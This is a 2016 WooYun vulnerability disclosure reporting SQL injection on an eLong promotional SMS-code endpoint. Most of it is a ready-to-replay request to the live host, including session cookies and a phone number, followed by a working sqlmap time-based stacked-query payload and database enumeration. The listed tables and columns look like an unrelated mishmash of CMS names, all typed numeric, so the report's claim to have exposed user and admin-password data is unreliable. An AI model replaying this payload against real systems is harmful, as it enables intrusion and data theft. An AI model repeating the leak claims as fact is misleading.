漏洞概要 关注数(8) 关注此漏洞
缺陷编号: WooYun-2016-184247
漏洞标题: 艺龙某站存在SQL注入两库170张表涉及用户表/管理员密码等
相关厂商: 艺龙旅行网
漏洞作者: hear7v
提交时间: 2016-03-14 09:54
公开时间: 2016-04-30 13:52
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 20
漏洞状态: 厂商已经确认
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
Tags标签: sql注入
漏洞详情
披露状态:
2016-03-14: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向核心白帽子及相关领域专家公开
2016-04-05: 细节向普通白帽子公开
2016-04-15: 细节向实习白帽子公开
2016-04-30: 细节向公众公开
简要描述:
好久没来wooyun交洞了,艺龙某站存在sql注入,两库170张表,大量用户信息,管理员密码等信息泄露,给个首页呗
详细说明:
{"target": "http://mhuodong.elong.com/PromotionJson/GetSmsCode", "agent": "Mozilla/5.0 (Linux; Android 4.4.4; HUAWEI ALE-CL00 Build/HuaweiALE-CL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 ewandroid/9.9.1", "referer": null, "report": "", "cookie": "H5SessionId=3dbcc29e-c256-4234-8570-eda034ce26cc; H5Channel=ewhtml5%2cDefault; H5CookieId_s=e924cf81-2df0-4bfa-8571-8a6d99bfd0be; H5CookieId=e924cf81-2df0-4bfa-8571-8a6d99bfd0be; route=b0c9360f937aba159859a160623bc8de; Hm_lvt_a6bc45911d1a6843649fb7ba8676cc71=1457837385; Hm_lpvt_a6bc45911d1a6843649fb7ba8676cc71=1457837385; Hm_lvt_2547ead1439a4e1d06c7eb9e330939fd=1457837386; Hm_lpvt_2547ead1439a4e1d06c7eb9e330939fd=1457837386; NSC_NCBQQEXOME_80=ffffffffaf1d13b445525d5f4f58455e445a4a4229a0", "data": "activityId=65698945-4ed7-4e70-9078-fae5a80c78fe&mobile=18980144019&gCode="}
漏洞证明:
sqlmap identified the following injection point(s) with a total of 239 HTTP(s) requests:
---
Parameter: activityId (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: activityId=65698945-4ed7-4e70-9078-fae5a80c78fe';(SELECT * FROM (SELECT(SLEEP(5)))gbhk)#&mobile=18980144019&gCode=
---
back-end DBMS: MySQL 5.0.11
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: activityId (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: activityId=65698945-4ed7-4e70-9078-fae5a80c78fe';(SELECT * FROM (SELECT(SLEEP(5)))gbhk)#&mobile=18980144019&gCode=
---
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] test
[*] weixinpacket
Database: test
[163 tables]
+-----------------------------+
| BDDJoueurs |
| Booked_On |
| Campus |
| CodeRuleType |
| DEPARTAMENTO |
| DWE_Predecessors |
| D_Abbreviation |
| D_EM_DESTINATARIO |
| D_Format_Data |
| Descriptions_Languages |
| EMPLEADO |
| Equipment |
| LT_CUSTOM1 |
| LT_CUSTOM2 |
| LT_CUSTOM3 |
| LT_CUSTOM4 |
| LT_GRUPO |
| MM_USUARIOS_DO_PROCESSO |
| Model |
| POINT |
| Parametre |
| PostalAddress |
| Propdesc_table |
| Property |
| RATING |
| ROLE_PERM |
| SYNALLAGI |
| S_SESSOES |
| StateType |
| Station_Data |
| THOT_YEAR |
| UM_ROLE_ATTRIBUTES |
| Users |
| null |
| size |
| access_control |
| account_multi |
| account_transaction |
| accountuser |
| acctmanager |
| actualites |
| admin_psw |
| artikel_variationsgruppen |
| basePlusCommissionEmployees |
| binn_articles |
| binn_bann_temps |
| binn_catlinks |
| binn_cform_settings |
| binn_docs_temps |
| binn_faq_temps |
| binn_forum_threads |
| binn_news |
| binn_rubrikator_tlevel |
| binn_system_messages |
| binn_vote_results |
| cdb_announcements |
| cdb_attachments |
| cdb_banned |
| cdb_debates |
| cdv_curated_allele |
| cocktail_person |
| combustiblebois |
| connections |
| contador_empresa |
| convite |
| copytest |
| curso |
| dados_familia |
| dados_prefeitura |
| decodifica_tabelle |
| despesa_familia |
| div_treatment |
| dtb_bat_order_daily_age |
| dtb_send_customer |
| economy |
| email |
| emailinfo |
| enrolls |
| ew_gruppi |
| ezsearch_return_count_new |
| ezsearch_search_phrase_new |
| f_spatialcontext |
| files |
| forum_user_stat |
| gd |
| geo_lake |
| gl |
| greylist |
| hardware |
| house_extensions |
| ibf_members |
| images |
| instituicao |
| ippaths |
| jforum_posts |
| jforum_ranks |
| jiveID |
| jos_polls |
| jos_respuestas |
| jos_vm_orders |
| kauf_artikel |
| kontakt |
| logradouro |
| m_data |
| mehrwertsteuer |
| mein_doc |
| mtb_zip |
| mymps_certification |
| mymps_member_tpl |
| mymps_upload |
| nuke_journal |
| nuke_links_categories |
| nuke_message |
| nuke_related |
| nuke_topics |
| nuke_users_temp |
| officer |
| osc_products |
| partsgroup |
| perfil |
| photo |
| phpbb_confirm |
| phpbb_search_results |
| phpbb_themes_name |
| pictures |
| post |
| pricegroup |
| problem |
| queue_info |
| redirect |
| reserve |
| riddles |
| routerbenchmarks |
| serie |
| site_environment |
| site_location |
| soc_da_polit_ge |
| software |
| spip_articles |
| spip_mots_documents |
| studierende |
| sysmaps |
| sysmergeschemaarticles |
| tb_username |
| tbadmins |
| tblStones |
| tblmanagers |
| templatelinks |
| tf_rss |
| tmp |
| topic |
| trackbacks |
| trivia |
| ts2_server_privileges |
| tt_address |
| tx_tcdirectmail_targets |
| user_preferences |
| user_rights |
| valhalla |
| verkaeufer |
| webcal_group_user |
| zl_baoming |
| zl_finance |
+-----------------------------+
Database: weixinpacket
[9 tables]
+---------------------+
| dictionary |
| ew_moduli |
| imageAttribute |
| iplinks |
| maxcodevento |
| phpbb_themes |
| rating_track |
| reciprocal_admin |
| vrls_listing_images |
+---------------------+
back-end DBMS: MySQL 5.0.11
Database: test
Table: users
[14 columns]
+----------------------------+---------+
| Column | Type |
+----------------------------+---------+
| caroline-du-nord | numeric |
| adminpass | numeric |
| fldfuntype | numeric |
| id_refferer | numeric |
| idricoverohatipologia | numeric |
| mod_virtuemart_featureprod | numeric |
| shared_secret | numeric |
| sub | numeric |
| sub_comment1 | numeric |
| sub_comment5 | numeric |
| tutor | numeric |
| uname | numeric |
| version_min | numeric |
| zid | numeric |
+----------------------------+---------+
修复方案:
过滤
版权声明:转载请注明来源 hear7v@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2016-03-16 13:52
厂商回复:
已验证,感谢白帽子!
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
评价
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论